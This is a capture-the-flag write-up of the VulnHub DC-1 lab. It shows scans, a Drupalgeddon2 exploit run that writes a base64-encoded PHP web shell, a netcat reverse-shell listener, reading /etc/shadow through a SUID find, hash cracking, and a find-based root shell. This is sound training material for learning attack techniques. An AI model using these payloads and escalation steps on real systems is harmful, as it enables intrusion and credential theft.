VulnHub DC1
12 April, 2021
Machine Link: https://www.vulnhub.com/entry/dc-1,292/
Beginning with an nmap scan
$ sudo nmap -A -p 1-20000 192.168.56.116
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 192.168.56.116
Host is up (0.0013s latency).
Not shown: 19997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33063/udp status
| 100024 1 34985/udp6 status
| 100024 1 43805/tcp status
|_ 100024 1 52163/tcp6 status
MAC Address: 08:00:27:18:34:12 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.25 ms 192.168.56.116
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.95 seconds
Drupal website delivered via Apache 2.2.22... I tried to check all the paths mentioned in robots.txt, none of them revealed any information.
Next I performed a nikto scan
$ nikto -host http://192.168.56.116
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.116
+ Target Hostname: 192.168.56.116
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 152289, size: 1561, mtime: Wed Nov 20 15:45:59 2013
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-39272: /misc/favicon.ico file identifies this app/server as: Drupal 7.x
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
I moved on to the next port but again nothing significant
$ rpcinfo 192.168.56.116
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /var/run/rpcbind.sock portmapper superuser
100000 3 local /var/run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.129.39 status 102
100024 1 tcp 0.0.0.0.171.29 status 102
100024 1 udp6 ::.136.169 status 102
100024 1 tcp6 ::.203.195 status 102
So now I started searching around and found drupalgeddon, an exploit available for certain minor versions of Drupal 7 and it worked! This gave me a low privilege shell..
# ./drupalgeddon2.rb 192.168.56.116
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.56.116/
--------------------------------------------------------------------------------
[!] MISSING: http://192.168.56.116/CHANGELOG.txt (HTTP Response: 404)
[!] MISSING: http://192.168.56.116/core/CHANGELOG.txt (HTTP Response: 404)
[+] Found : http://192.168.56.116/includes/bootstrap.inc (HTTP Response: 403)
[+] Header : v7 [X-Generator]
[!] MISSING: http://192.168.56.116/core/includes/bootstrap.inc (HTTP Response: 404)
[!] MISSING: http://192.168.56.116/includes/database.inc (HTTP Response: 403)
[+] Found : http://192.168.56.116/ (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: http://192.168.56.116/ (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo YWVKYANZ
[+] Result : YWVKYANZ
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://192.168.56.116/shell.php)
[i] Response: HTTP 404 // Size: 13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://192.168.56.116/shell.php' -d 'c=hostname'
DC-1>> whoami
www-data
DC-1>> hostname
DC-1
DC-1>> pwd
/var/www
DC-1>> ls -ltrha
total 192K
-rwxr-xr-x 1 www-data www-data 18K Nov 1 2013 LICENSE.txt
-rw-r--r-- 1 www-data www-data 417 Nov 21 2013 xmlrpc.php
-rw-r--r-- 1 www-data www-data 2.2K Nov 21 2013 web.config
-rw-r--r-- 1 www-data www-data 20K Nov 21 2013 update.php
drwxr-xr-x 7 www-data www-data 4.0K Nov 21 2013 themes
drwxr-xr-x 4 www-data www-data 4.0K Nov 21 2013 sites
drwxr-xr-x 2 www-data www-data 4.0K Nov 21 2013 scripts
-rw-r--r-- 1 www-data www-data 1.6K Nov 21 2013 robots.txt
drwxr-xr-x 5 www-data www-data 4.0K Nov 21 2013 profiles
drwxr-xr-x 42 www-data www-data 4.0K Nov 21 2013 modules
drwxr-xr-x 4 www-data www-data 4.0K Nov 21 2013 misc
-rw-r--r-- 1 www-data www-data 703 Nov 21 2013 install.php
-rw-r--r-- 1 www-data www-data 529 Nov 21 2013 index.php
drwxr-xr-x 4 www-data www-data 4.0K Nov 21 2013 includes
-rw-r--r-- 1 www-data www-data 720 Nov 21 2013 cron.php
-rw-r--r-- 1 www-data www-data 6.5K Nov 21 2013 authorize.php
-rw-r--r-- 1 www-data www-data 9.5K Nov 21 2013 UPGRADE.txt
-rw-r--r-- 1 www-data www-data 5.3K Nov 21 2013 README.txt
-rw-r--r-- 1 www-data www-data 8.0K Nov 21 2013 MAINTAINERS.txt
-rw-r--r-- 1 www-data www-data 18K Nov 21 2013 INSTALL.txt
-rw-r--r-- 1 www-data www-data 1.3K Nov 21 2013 INSTALL.sqlite.txt
-rw-r--r-- 1 www-data www-data 1.9K Nov 21 2013 INSTALL.pgsql.txt
-rw-r--r-- 1 www-data www-data 1.5K Nov 21 2013 INSTALL.mysql.txt
-rw-r--r-- 1 www-data www-data 1.5K Nov 21 2013 COPYRIGHT.txt
-rw-r--r-- 1 www-data www-data 5.7K Nov 21 2013 .htaccess
-rw-r--r-- 1 www-data www-data 174 Nov 21 2013 .gitignore
drwxr-xr-x 12 root root 4.0K Feb 19 2019 ..
-rw-r--r-- 1 www-data www-data 52 Feb 19 2019 flag1.txt
drwxr-xr-x 9 www-data www-data 4.0K Apr 12 02:47 .
-rw-r--r-- 1 www-data www-data 75 Apr 12 02:47 shell.php
DC-1>> cat flag1.txt
Every good CMS needs a config file - and so do you.
Obeying the hint, I found database credentials in sites/default/settings.php, and also the second flag
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
I couldn't use the MySQL cli through the shell started by the exploit, so I created a reverse shell first and was able to login to the MySQL instance
$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 42711
www-data@DC-1:/var/www$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1542
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SHOW DATABASES;
SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql> USE drupaldb;
USE drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SHOW TABLES;
SHOW TABLES;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
mysql> SELECT name, mail, pass FROM users;
SELECT name, mail, pass FROM users;
+-------+-------------------+---------------------------------------------------------+
| name | mail | pass |
+-------+-------------------+---------------------------------------------------------+
| | | |
| admin | admin@example.com | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| Fred | fred@example.org | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
| dru | dru@admin.com | $S$D5UnAyJ1hIEF2EmXjYn6bAa2.vNf0KS4alEdkcldvHoKBKvRIcX6 |
+-------+-------------------+---------------------------------------------------------+
4 rows in set (0.00 sec)
While the hashes were being matched using hashcat, I looked at some other tables and found a flag in the node table
mysql> SELECT * FROM node;
SELECT * FROM node;
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
| nid | vid | type | language | title | uid | status | created | changed | comment | promote | sticky | tnid | translate |
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
| 1 | 1 | page | und | Main | 2 | 1 | 1550582250 | 1550582250 | 0 | 0 | 0 | 0 | 0 |
| 2 | 2 | page | und | flag3 | 1 | 0 | 1550582412 | 1550583860 | 0 | 0 | 0 | 0 | 0 |
+-----+------+------+----------+-------+-----+--------+------------+------------+---------+---------+--------+------+-----------+
2 rows in set (0.00 sec)
mysql> SELECT * FROM field_data_body WHERE entity_id = 2;
SELECT * FROM field_data_body WHERE entity_id = 2;
+-------------+--------+---------+-----------+-------------+----------+-------+------------------------------------------------------------------------------------------------------------------------------+--------------+---------------+
| entity_type | bundle | deleted | entity_id | revision_id | language | delta | body_value | body_summary | body_format |
+-------------+--------+---------+-----------+-------------+----------+-------+------------------------------------------------------------------------------------------------------------------------------+--------------+---------------+
| node | page | 0 | 2 | 2 | und | 0 | Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow. | | filtered_html |
+-------------+--------+---------+-----------+-------------+----------+-------+------------------------------------------------------------------------------------------------------------------------------+--------------+---------------+
1 row in set (0.00 sec)
Following flag3, I thought of the find command and it's -exec option, and special perms => SUID binaries? Let's check that hypothesis
DC-1>> find / -perm -4000 2>/dev/null
[!] WARNING: Detected an known bad character (>)
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
find: `/proc/3424/task/3424/fd/5': No such file or directory
find: `/proc/3424/task/3424/fdinfo/5': No such file or directory
find: `/proc/3424/fd/5': No such file or directory
find: `/proc/3424/fdinfo/5': No such file or directory
DC-1>> ls -ltrha /usr/bin/find
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
OK, so find has SUID permission and is owned by root
DC-1>> find /etc -name "shadow" -exec cat {} \;
root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
daemon:*:17946:0:99999:7:::
bin:*:17946:0:99999:7:::
sys:*:17946:0:99999:7:::
sync:*:17946:0:99999:7:::
games:*:17946:0:99999:7:::
man:*:17946:0:99999:7:::
lp:*:17946:0:99999:7:::
mail:*:17946:0:99999:7:::
news:*:17946:0:99999:7:::
uucp:*:17946:0:99999:7:::
proxy:*:17946:0:99999:7:::
www-data:*:17946:0:99999:7:::
backup:*:17946:0:99999:7:::
list:*:17946:0:99999:7:::
irc:*:17946:0:99999:7:::
gnats:*:17946:0:99999:7:::
nobody:*:17946:0:99999:7:::
libuuid:!:17946:0:99999:7:::
Debian-exim:!:17946:0:99999:7:::
statd:*:17946:0:99999:7:::
messagebus:*:17946:0:99999:7:::
sshd:*:17946:0:99999:7:::
mysql:!:17946:0:99999:7:::
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::
Two SHA 512 hashes to crack, more work for hashcat. flag4's password was found in rockyou.txt instantly
$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:orange
Logging in as flag4, I found the next flag. Since it said the same method, I searched for a way to switch to root with an SUID find and found one on GTFOBins
$ ssh flag4@192.168.56.116
The authenticity of host '192.168.56.116 (192.168.56.116)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.116' (ECDSA) to the list of known hosts.
flag4@192.168.56.116's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls -ltrha
total 28K
-rw-r--r-- 1 flag4 flag4 220 Feb 19 2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 675 Feb 19 2019 .profile
-rw-r--r-- 1 flag4 flag4 3.4K Feb 19 2019 .bashrc
-rw-r--r-- 1 flag4 flag4 125 Feb 19 2019 flag4.txt
-rw------- 1 flag4 flag4 28 Feb 19 2019 .bash_history
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 2019 .
drwxr-xr-x 3 root root 4.0K Feb 19 2019 ..
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
flag4@DC-1:~$ find . -exec /bin/sh \; -quit
# whoami
root
# id
uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7